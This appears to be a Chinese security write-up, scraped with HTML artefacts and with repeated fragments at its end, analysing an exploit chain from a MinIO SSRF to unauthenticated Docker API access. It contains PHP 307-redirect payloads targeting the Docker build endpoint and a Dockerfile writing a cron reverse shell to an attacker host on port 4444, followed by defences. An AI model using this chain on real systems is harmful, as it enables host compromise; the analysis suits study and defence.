MinIO SSRF漏洞与Docker API未授权访问结合利用分析<\/h1>

1. 漏洞背景<\/h2>

1.1 MinIO SSRF漏洞<\/h3>
MinIO是一个高性能对象存储服务，在RELEASE.2021-01-30T00-20-58Z之前的版本中存在服务器端请求伪造(SSRF)漏洞。该漏洞源于MinIO会从HTTP头Host中获取地址并构造新的URL，攻击者可以通过控制Host头实现SSRF攻击。<\/p>

1.2 Docker API未授权访问<\/h3>
Docker Swarm是Docker的集群管理工具，使用标准的Docker API通过2375端口管理节点。当2375端口直接暴露且未做权限检查时，存在未授权访问漏洞，攻击者可执行任意Docker操作，包括获取宿主机权限。<\/p>

2. 环境搭建<\/h2>

2.1 开启Docker API<\/h3>

# 修改Docker配置<\/span>
<\/span><\/span>vim \/etc\/docker\/daemon.json
<\/span><\/span># 添加以下内容<\/span>
<\/span><\/span>{<\/span>
<\/span><\/span>  "hosts"<\/span>: [<\/span>"tcp:\/\/0.0.0.0:2375"<\/span>, "unix:\/\/\/var\/run\/docker.sock"<\/span>]<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span># 重启Docker服务<\/span>
<\/span><\/span>systemctl restart docker
<\/span><\/span><\/code><\/pre>2.2 安装MinIO<\/h3>
docker pull minio\/minio:RELEASE.2021-01-30T00-20-58Z
<\/span><\/span>docker run -p 9000:9000 minio\/minio server \/data
<\/span><\/span><\/code><\/pre>验证环境是否搭建成功：<\/p>

访问http:\/\/your-ip:9000应出现MinIO登录界面<\/li>
访问http:\/\/your-ip:2375\/version应返回Docker版本信息<\/li>
<\/ul>
3. 漏洞分析<\/h2>
3.1 MinIO SSRF机制<\/h3>
MinIO在处理请求时：<\/p>

从Host头获取"自己的地址"<\/li>
使用该地址构造新的URL<\/li>
由于未对Host头进行严格验证，导致SSRF漏洞<\/li>
<\/ol>
3.2 Docker API未授权风险<\/h3>
通过未授权的Docker API可以：<\/p>

运行任意容器<\/li>
挂载宿主机目录<\/li>
写入定时任务或SSH密钥<\/li>
获取宿主机shell<\/li>
<\/ol>
4. 漏洞利用<\/h2>
4.1 基础探测<\/h3>
# 探测MinIO服务<\/span>
<\/span><\/span>curl -v http:\/\/target:9000
<\/span><\/span>
<\/span><\/span># 探测Docker API<\/span>
<\/span><\/span>curl http:\/\/target:2375\/version
<\/span><\/span><\/code><\/pre>4.2 SSRF利用<\/h3>
通过修改Host头实现SSRF：<\/p>
POST<\/span> \/ HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 127.0.0.1:2375<\/span>
<\/span><\/span>...<\/span>
<\/span><\/span><\/code><\/pre>4.3 302跳转限制<\/h3>
传统302跳转会将POST转为GET，无法保持原始请求方法。<\/p>
4.4 307跳转优势<\/h3>
307跳转特点：<\/p>

保持原始请求方法(POST\/PUT等)<\/li>
可传递原始请求参数<\/li>
适用于需要保持请求方法的场景<\/li>
<\/ul>
PHP实现307跳转：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>header<\/span>("Location: http:\/\/127.0.0.1:2375\/v1.41\/images\/create?fromImage=alpine&tag=latest"<\/span>, true<\/span>, 307<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>4.5 Docker API利用链<\/h3>

通过SSRF访问Docker API<\/li>
使用307跳转保持POST方法<\/li>
利用Docker API的GET参数创建容器<\/li>
<\/ol>
关键API端点：<\/p>
\/v1.41\/images\/create?fromImage=alpine&tag=latest
<\/code><\/pre>
5. 完整攻击流程<\/h2>
5.1 准备恶意Dockerfile<\/h3>
FROM<\/span> alpine<\/span>
<\/span><\/span><\/span><\/span>RUN<\/span> echo '* * * * * \/bin\/bash -i >& \/dev\/tcp\/attacker-ip\/4444 0>&1'<\/span> > \/var\/spool\/cron\/root
<\/span><\/span><\/span><\/code><\/pre>5.2 搭建HTTP服务<\/h3>
将Dockerfile放在Web服务器可访问路径：<\/p>
python3 -m http.server 8000<\/span>
<\/span><\/span><\/code><\/pre>5.3 构造307跳转<\/h3>
修改跳转目标为Docker构建API：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>header<\/span>("Location: http:\/\/127.0.0.1:2375\/v1.41\/build?dockerfile=http:\/\/attacker-ip:8000\/Dockerfile"<\/span>, true<\/span>, 307<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>5.4 发起攻击<\/h3>

向MinIO发送恶意请求，Host头指向127.0.0.1:2375<\/li>
MinIO会向Docker API发起请求<\/li>
307跳转保持POST方法并传递构建参数<\/li>
Docker从攻击者服务器拉取恶意Dockerfile并构建镜像<\/li>
镜像运行时写入定时任务<\/li>
攻击者监听4444端口获取反弹shell<\/li>
<\/ol>
6. 防御措施<\/h2>
6.1 MinIO防护<\/h3>

升级到最新版本<\/li>
严格验证Host头<\/li>
限制内部网络访问<\/li>
<\/ol>
6.2 Docker防护<\/h3>

禁止Docker API直接暴露在公网<\/li>
使用TLS认证<\/li>
配置防火墙规则限制访问<\/li>
使用网络策略限制容器通信<\/li>
<\/ol>
7. 总结<\/h2>
该利用链结合了：<\/p>

MinIO的SSRF漏洞实现内网请求<\/li>
307跳转保持请求方法<\/li>
Docker API的GET参数创建功能绕过限制<\/li>
通过镜像构建实现命令执行<\/li>
<\/ol>
这种攻击方式展示了如何将看似有限的SSRF漏洞转化为完整的系统入侵，强调了纵深防御的重要性。<\/p>

MinIO SSRF漏洞与Docker API未授权访问结合利用分析<\/h1>

1. 漏洞背景<\/h2>

1.1 MinIO SSRF漏洞<\/h3> MinIO是一个高性能对象存储服务，在RELEASE.2021-01-30T00-20-58Z之前的版本中存在服务器端请求伪造(SSRF)漏洞。该漏洞源于MinIO会从HTTP头Host中获取地址并构造新的URL，攻击者可以通过控制Host头实现SSRF攻击。<\/p>

1.2 Docker API未授权访问<\/h3> Docker Swarm是Docker的集群管理工具，使用标准的Docker API通过2375端口管理节点。当2375端口直接暴露且未做权限检查时，存在未授权访问漏洞，攻击者可执行任意Docker操作，包括获取宿主机权限。<\/p>

2. 环境搭建<\/h2>

3. 漏洞分析<\/h2>

4. 漏洞利用<\/h2>

4.3 302跳转限制<\/h3> 传统302跳转会将POST转为GET，无法保持原始请求方法。<\/p>

5. 完整攻击流程<\/h2>

6. 防御措施<\/h2>

1.1 MinIO SSRF漏洞<\/h3>
MinIO是一个高性能对象存储服务，在RELEASE.2021-01-30T00-20-58Z之前的版本中存在服务器端请求伪造(SSRF)漏洞。该漏洞源于MinIO会从HTTP头Host中获取地址并构造新的URL，攻击者可以通过控制Host头实现SSRF攻击。<\/p>

1.2 Docker API未授权访问<\/h3>
Docker Swarm是Docker的集群管理工具，使用标准的Docker API通过2375端口管理节点。当2375端口直接暴露且未做权限检查时，存在未授权访问漏洞，攻击者可执行任意Docker操作，包括获取宿主机权限。<\/p>

4.3 302跳转限制<\/h3>
传统302跳转会将POST转为GET，无法保持原始请求方法。<\/p>